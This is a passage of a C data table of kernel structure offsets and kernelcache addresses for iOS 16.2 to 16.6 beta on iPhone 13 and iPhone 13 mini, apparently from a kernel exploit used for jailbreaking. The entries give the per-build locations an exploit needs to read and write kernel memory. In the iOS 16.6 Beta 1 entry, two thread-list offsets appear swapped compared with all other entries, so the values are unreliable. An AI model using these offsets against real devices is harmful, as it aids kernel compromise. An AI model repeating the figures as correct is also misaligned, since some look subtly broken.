0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a465208, .kernelcache__gPhysBase = 0xfffffff007937fc0, .kernelcache__gPhysSize = 0xfffffff007937fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007936198, .kernelcache__perfmon_devices = 0xfffffff00a4a3520, .kernelcache__perfmon_dev_open = 0xfffffff007ef9210, .kernelcache__ptov_table = 0xfffffff0078eb180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4a2990, .kernelcache__vm_pages = 0xfffffff0078e7ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ea130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4a2988, .kernelcache__vn_kqfilter = 0xfffffff007f45ae0, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E252", .device_id = "iPhone14,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a465208, .kernelcache__gPhysBase = 0xfffffff007937fc0, .kernelcache__gPhysSize = 0xfffffff007937fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007936198, .kernelcache__perfmon_devices = 0xfffffff00a4a3520, .kernelcache__perfmon_dev_open = 0xfffffff007ef9210, .kernelcache__ptov_table = 0xfffffff0078eb180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4a2990, .kernelcache__vm_pages = 0xfffffff0078e7ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ea130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4a2988, .kernelcache__vn_kqfilter = 0xfffffff007f45ae0, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:09:37 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8110", .build_version = "20F66", .device_id = "iPhone14,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a471208, .kernelcache__gPhysBase = 0xfffffff00793c100, .kernelcache__gPhysSize = 0xfffffff00793c100 + 0x8, .kernelcache__gVirtBase = 0xfffffff00793a2d8, .kernelcache__perfmon_devices = 0xfffffff00a4af520, .kernelcache__perfmon_dev_open = 0xfffffff007efd480, .kernelcache__ptov_table = 0xfffffff0078ef180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ae990, .kernelcache__vm_pages = 0xfffffff0078ebec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ee130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ae988, .kernelcache__vn_kqfilter = 0xfffffff007f49fe8, }, // iOS 16.6 Beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:16:18 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8110", .build_version = "20G5026e", .device_id = "iPhone14,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x380 - 0x18, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x80 - 0x28, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000,//good .kernelcache__cdevsw = 0xfffffff00a519a30, //good .kernelcache__gPhysBase = 0xfffffff0079502a8, //good .kernelcache__gPhysSize = 0xfffffff0079502b0, //good .kernelcache__gVirtBase = 0xfffffff00794e460, //good .kernelcache__perfmon_devices = 0xfffffff00a559550, //good .kernelcache__perfmon_dev_open = 0xfffffff007f1db9c, //good .kernelcache__ptov_table = 0xfffffff0079039c0, //good .kernelcache__vm_first_phys_ppnum = 0xfffffff00a558910, //good .kernelcache__vm_pages = 0xfffffff007900110, //good .kernelcache__vm_page_array_beginning_addr = 0xfffffff007902970, //good .kernelcache__vm_page_array_ending_addr = 0xfffffff00a558908, //good .kernelcache__vn_kqfilter = 0xfffffff007f6a0b8, //good }, // End iPhone 13 // // Start iPhone 13 Mini // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:56 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8110", .build_version = "20C65", .device_id = "iPhone14,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a379190, .kernelcache__gPhysBase = 0xfffffff0078580c8, .kernelcache__gPhysSize = 0xfffffff0078580c8 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078562a8, .kernelcache__perfmon_devices = 0xfffffff00a3b43b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed8fa8, .kernelcache__ptov_table = 0xfffffff00780b370, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3b3800, .kernelcache__vm_pages = 0xfffffff007808098, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00780a330, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3b37f8, .kernelcache__vn_kqfilter = 0xfffffff007f28fd0, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D47", .device_id = "iPhone14,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381190, .kernelcache__gPhysBase = 0xfffffff0078581b0, .kernelcache__gPhysSize = 0xfffffff0078581b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007856390, .kernelcache__perfmon_devices = 0xfffffff00a3bc3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed905c, .kernelcache__ptov_table = 0xfffffff00780b3b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3bb800, .kernelcache__vm_pages = 0xfffffff0078080d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00780a370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3bb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f29074, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D67", .device_id = "iPhone14,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381190, .kernelcache__gPhysBase = 0xfffffff0078581b0, .kernelcache__gPhysSize = 0xfffffff0078581b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007856390, .kernelcache__perfmon_devices = 0xfffffff00a3bc3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed905c, .kernelcache__ptov_table = 0xfffffff00780b3b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3bb800, .kernelcache__vm_pages = 0xfffffff0078080d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00780a370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3bb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f29074, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E247", .device_id = "iPhone14,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a465208, .kernelcache__gPhysBase = 0xfffffff007937fc0, .kernelcache__gPhysSize = 0xfffffff007937fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007936198, .kernelcache__perfmon_devices = 0xfffffff00a4a3520, .kernelcache__perfmon_dev_open = 0xfffffff007ef9210, .kernelcache__ptov_table = 0xfffffff0078eb180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4a2990, .kernelcache__vm_pages = 0xfffffff0078e7ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ea130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4a2988, .kernelcache__vn_kqfilter = 0xfffffff007f45ae0, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E252", .device_id = "iPhone14,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a465208, .kernelcache__gPhysBase = 0xfffffff007937fc0, .kernelcache__gPhysSize = 0xfffffff007937fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007936198, .kernelcache__perfmon_devices = 0xfffffff00a4a3520, .kernelcache__perfmon_dev_open = 0xfffffff007ef9210, .kernelcache__ptov_table = 0xfffffff0078eb180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4a2990, .kernelcache__vm_pages = 0xfffffff0078e7ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ea130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4a2988, .kernelcache__vn_kqfilter = 0xfffffff007f45ae0, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:09:37 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8110", .build_version = "20F66", .device_id = "iPhone14,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 